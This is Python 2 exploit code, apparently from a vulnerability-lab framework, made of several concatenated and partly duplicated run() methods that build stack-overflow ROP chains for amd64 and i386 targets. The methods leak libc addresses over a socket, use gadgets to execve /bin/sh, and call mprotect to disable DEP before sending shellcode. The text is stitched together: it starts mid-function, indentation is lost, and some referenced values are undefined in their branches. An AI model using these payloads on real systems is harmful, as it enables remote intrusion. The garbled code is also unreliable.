payload = "a"*self.property['offset'] + p64(pop_ret1_addr) + p64(self.property['pageaddress']) + p64(pop_ret2_addr) + p64(self.property['data1']) + p64(pagenum) + p64(pop_ret3_addr) + p64(self.property['data3']) + p64(pop_ret4_addr) + p64(self.property['shellcodeaddress']) + p64(binsh_addr) + p64(self.property['data4']) + p64(self.property['data5']) + p64(self.property['data5']) + shellcode
print "\n##########sending payload to shut off dep ##########\n"
s.send(payload)
s.close()
def run(self):
if self.options['architecture'] == 'amd64':
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
self.property = {'ret1': 0x0000000000021102, # gadget address in libc
'ret2': 0x000000000008ae95,
'ret3': 0x000000000003a718,
'ret4': 0x0000000000114809,
'ret5': 0x00000000000bb945,
'data1': 0x000000000000003b, # execv systemcall number
'data2': 0x0000000000000000,
'data3': 0x0000000000000000,
'offset': 40, # offset
'sysaddress': 0x0} # system function address, initialize 0
# get new sysaddress here
s.send("a") # any string
recv_data = s.recv(16)
self.property['sysaddress'] = int(recv_data, 16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
# get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) - libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
# get ret offset
pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
pop_ret5_offset = self.property['ret5'] - libc.symbols['system']
# get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
# get ret address
pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset
# pop_ret5_addr =pop_ret4_addr - 2
# set payload
payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(binsh_addr) + p64(
pop_ret2_addr) + p64(pop_ret3_addr) + p64(self.property['data1']) + p64(pop_ret4_addr) + p64(
self.property['data2']) + p64(self.property['data3']) + p64(pop_ret5_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
else:
self.property = {'ret1': 0x0000000000401696, # gadget address in libc
'ret2': 0x00000000004264af,
'ret3': 0x00000000004c26e8,
'ret4': 0x0000000000442fe9,
'ret5': 0x0000000000467685,
'data1': 0x000000000000003b, # execv systemcall number
'data2': 0x0000000000000000,
'data3': 0x0000000000000000,
'offset': 24, # offset
'sysaddress': 0x0} # system function address, initialize 0
self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')
# get sysaddress here
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
# get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
# get ret address
pop_ret1_addr = self.property['ret1']
pop_ret2_addr = self.property['ret2']
pop_ret3_addr = self.property['ret3']
pop_ret4_addr = self.property['ret4']
pop_ret5_addr = self.property['ret5']
# set payload
payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(binsh_addr) + p64(
pop_ret2_addr) + p64(pop_ret3_addr) + p64(self.property['data1']) + p64(pop_ret4_addr) + p64(
self.property['data2']) + p64(self.property['data3']) + p64(pop_ret5_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
elif self.options['architecture'] == 'i386':
if self.options['static'] == 'False':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
self.property = {'ret1': 0x00018395, # gadget address in libc : pop ebx ; ret
'ret2': 0x0002c5dc, # : xor eax, eax ; ret
'ret3': 0x00023f97, # : pop eax ; ret
'ret4': 0x0002baab, # : pop ecx ; pop edx ; ret
'ret5': 0x00002c87, # : int 0x80
'data1': 0x0000000b, # execv systemcall number
'data2': 0x00000000,
'data3': 0x00000000,
'offset': 26, # offset
'sysaddress': 0x0} # system function address, initialize 0
# get new sysaddress here
s.send("a") # any string
recv_data = s.recv(8)
self.property['sysaddress'] = int(recv_data, 16)
libc = ELF('/lib32/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
# get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) - libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
# get ret offset
pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
pop_ret5_offset = self.property['ret5'] - libc.symbols['system']
# get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
# get ret address
pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset
# pop_ret5_addr =pop_ret4_addr - 2
# set payload
payload = "a" * self.property['offset'] + p32(pop_ret1_addr) + p32(binsh_addr) + p32(
pop_ret2_addr) + p32(pop_ret3_addr) + p32(self.property['data1']) + p32(pop_ret4_addr) + p32(
self.property['data2']) + p32(self.property['data3']) + p32(pop_ret5_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
else:
self.property = {'ret1': 0x080481d1, # : pop ebx ; ret
'ret2': 0x080494e3, # : xor eax, eax ; ret
'ret3': 0x080b95b6, # : pop eax ; ret
'ret4': 0x080e0859, # : pop ecx ; ret
'ret5': 0x0807079a, # : pop edx ; ret
'ret6': 0x0806e127, # : int 0x80
'data1': 0x0000000b, # execv systemcall number
'data2': 0x00000000,
'data3': 0x00000000,
'offset': 22, # offset
'sysaddress': 0x0} # system function address, initialize 0
self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic32'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/code_reuse32_static')
# get sysaddress here
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
# get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
# get ret address
pop_ret1_addr = self.property['ret1']
pop_ret2_addr = self.property['ret2']
pop_ret3_addr = self.property['ret3']
pop_ret4_addr = self.property['ret4']
pop_ret5_addr = self.property['ret5']
pop_ret6_addr = self.property['ret6']
# set payload
payload = "a" * self.property['offset'] + p32(pop_ret1_addr) + p32(binsh_addr) + p32(
pop_ret2_addr) + p32(pop_ret3_addr) + p32(self.property['data1']) + p32(pop_ret4_addr) + p32(
self.property['data2']) + p32(pop_ret5_addr) + p32(self.property['data3']) + p32(pop_ret6_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
else:
print 'Unrecognized architecture, stop.'
return
def run(self):
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
#get new sysaddress here
s.send('a')
recv_data = s.recv(16)
self.property['sysaddress'] = int(recv_data,16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
#get rbp
s.send('b')
recv_data1 = s.recv(16)
rbpvalue= int(recv_data1,16)
print "rbpvalue = " + hex(rbpvalue)
#get shellcode address
self.property['shellcodeaddress'] = rbpvalue + 96
#get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get ret offset
pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
#get ret address
pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
pop_ret3_addr = self.property['ret3']
pagenum=self.property['data2'] * 3
print pagenum
#print helloworld
shellcode="\xeb\x1e\x5e\x48\x31\xc0\xb0\x01"
shellcode +="\x48\x89\xc7\x48\x89\xfa\x48\x83"
shellcode +="\xc2\x0e\x0f\x05\x48\x31\xc0\x48"
shellcode +="\x83\xc0\x3c\x48\x31\xff\x0f\x05"
shellcode +="\xe8\xdd\xff\xff\xff\x48\x65\x6c"
shellcode +="\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
#shell
shellcode="\x5f\x48\x31\xc0\x58\x5a\x5e\x0f\x05"
#set payload rop shut off dep
payload = "a"*self.property['offset'] + p64(pop_ret1_addr) + p64(self.property['pageaddress']) + p64(pop_ret2_addr) + p64(self.property['data1']) + p64(pagenum) + p64(pop_ret3_addr) + p64(self.property['shellcodeaddress']) + p64(binsh_addr) + p64(self.property['data4']) + p64(self.property['data5']) + p64(self.property['data5']) + self.payload
print "\n##########sending payload to shut off dep ##########\n"
s.send(payload)
s.close()
else:
print 'no exit static'
def run(self):
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
#get new sysaddress here
s.send("a") #any string
recv_data = s.recv(8)
self.property['sysaddress'] = int(recv_data, 16)
libc = ELF('/lib32/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
#get /bin/sh offset
binsh_addr_offset = next(
libc.search('/bin/sh')) - libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get ret offset
pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
pop_ret5_offset = self.property['ret5'] - libc.symbols['system']
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
#get ret address
pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset
#pop_ret5_addr =pop_ret4_addr - 2
#set payload
payload = "a" * self.property['offset'] + p32(pop_ret1_addr) + p32(
binsh_addr) + p32(pop_ret2_addr) + p32(pop_ret3_addr) + p32(
self.property['data1']) + p32(pop_ret4_addr) + p32(
self.property['data2']) + p32(
self.property['data3']) + p32(pop_ret5_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
else:
self.property = {
'ret1': 0x0000000000401696, # gadget address in libc
'ret2': 0x00000000004264af,
'ret3': 0x00000000004c26e8,
'ret4': 0x0000000000442fe9,
'ret5': 0x0000000000467685,
'data1': 0x000000000000003b, #execv systemcall number
'data2': 0x0000000000000000,
'data3': 0x0000000000000000,
'offset': 24, # offset
'sysaddress': 0x0
} # system function address, initialize 0
self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')
#get sysaddress here
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
#get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
#get ret address
pop_ret1_addr = self.property['ret1']
pop_ret2_addr = self.property['ret2']
pop_ret3_addr = self.property['ret3']
pop_ret4_addr = self.property['ret4']
pop_ret5_addr = self.property['ret5']
#set payload
payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(
binsh_addr) + p64(pop_ret2_addr) + p64(pop_ret3_addr) + p64(
self.property['data1']) + p64(pop_ret4_addr) + p64(
self.property['data2']) + p64(
self.property['data3']) + p64(pop_ret5_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
def run(self):
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
#get new sysaddress here
s.send('a')
recv_data = s.recv(16)
self.property['sysaddress'] = int(recv_data, 16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
#get rbp
s.send('b')
recv_data1 = s.recv(16)
rbpvalue = int(recv_data1, 16)
print "rbpvalue = " + hex(rbpvalue)
#get shellcode address
self.property['shellcodeaddress'] = rbpvalue + 112
#get /bin/sh offset
binsh_addr_offset = next(
libc.search('/bin/sh')) - libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get ret offset
pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
#get ret address
pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
pagenum = self.property['data2'] * 3
print pagenum
#print helloworld
shellcode = "\xeb\x1e\x5e\x48\x31\xc0\xb0\x01"
shellcode += "\x48\x89\xc7\x48\x89\xfa\x48\x83"
shellcode += "\xc2\x0e\x0f\x05\x48\x31\xc0\x48"
shellcode += "\x83\xc0\x3c\x48\x31\xff\x0f\x05"
shellcode += "\xe8\xdd\xff\xff\xff\x48\x65\x6c"
shellcode += "\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
#shell
shellcode = "\x5f\x48\x31\xc0\x58\x5a\x5e\x0f\x05"
#set payload rop shut off dep
payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(
self.property['pageaddress']) + p64(pop_ret2_addr) + p64(
self.property['data1']
) + p64(pagenum) + p64(pop_ret3_addr) + p64(
self.property['data3']) + p64(pop_ret4_addr) + p64(
self.property['shellcodeaddress']) + p64(
binsh_addr) + p64(self.property['data4']) + p64(
self.property['data5']) + p64(
self.property['data5']) + self.payload
print "\n##########sending payload to shut off dep ##########\n"
s.send(payload)
s.close()
else:
self.property = {
'ret1': 0x0000000000401696, #gadget address
'ret2': 0x0000000000442fe9,
'ret3': 0x00000000004c26e8,
'ret4': 0x0000000000467685,
'pageaddress': 0x7fffffffd000,
'shellcodeaddress': 0x0, #shellcode address in stack
'data1':
0x0000000000000007, # PROT_EXEC The memory can be executed.
'data2': 0x0000000000001000, # 4096 pagesize
'data3':
0x000000000000000a, #mprotect systemcall number, mprotect() changes protection for the calling process's memory page(s)
'data4': 0x000000000000003b, #execv systemcall number
'data5': 0x0000000000000000,
'offset': 24, # offset
'sysaddress': 0x0
} # system function address, initialize 0
self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF(
'../../vulnerabilities/stack_overflow/ggteststatic_stacknoexe')
#get sysaddress here
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
#get rbp
s.send('b')
recv_data1 = s.recv(16)
rbpvalue = int(recv_data1, 16)
print "rbpvalue = " + hex(rbpvalue)
#get shellcode address
self.property['shellcodeaddress'] = rbpvalue + 112
#get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
#get ret offset
pop_ret1_addr = self.property['ret1']
pop_ret2_addr = self.property['ret2']
pop_ret3_addr = self.property['ret3']
pop_ret4_addr = self.property['ret4']
pagenum = self.property['data2'] * 3
print pagenum
#print helloworld
shellcode = "\xeb\x1e\x5e\x48\x31\xc0\xb0\x01"
shellcode += "\x48\x89\xc7\x48\x89\xfa\x48\x83"
shellcode += "\xc2\x0e\x0f\x05\x48\x31\xc0\x48"
shellcode += "\x83\xc0\x3c\x48\x31\xff\x0f\x05"
shellcode += "\xe8\xdd\xff\xff\xff\x48\x65\x6c"
shellcode += "\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a"
#shell
#shellcode="\x5f\x48\x31\xc0\x58\x5a\x5e\x0f\x05"
#set payload rop shut off dep
payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(
self.property['pageaddress']) + p64(pop_ret2_addr) + p64(
self.property['data1']
) + p64(pagenum) + p64(pop_ret3_addr) + p64(
self.property['data3']) + p64(pop_ret4_addr) + p64(
self.property['shellcodeaddress']) + p64(
binsh_addr) + p64(self.property['data4']) + p64(
self.property['data5']) + p64(
self.property['data5']) + shellcode
print "\n##########sending payload to shut off dep ##########\n"
s.send(payload)
s.close()
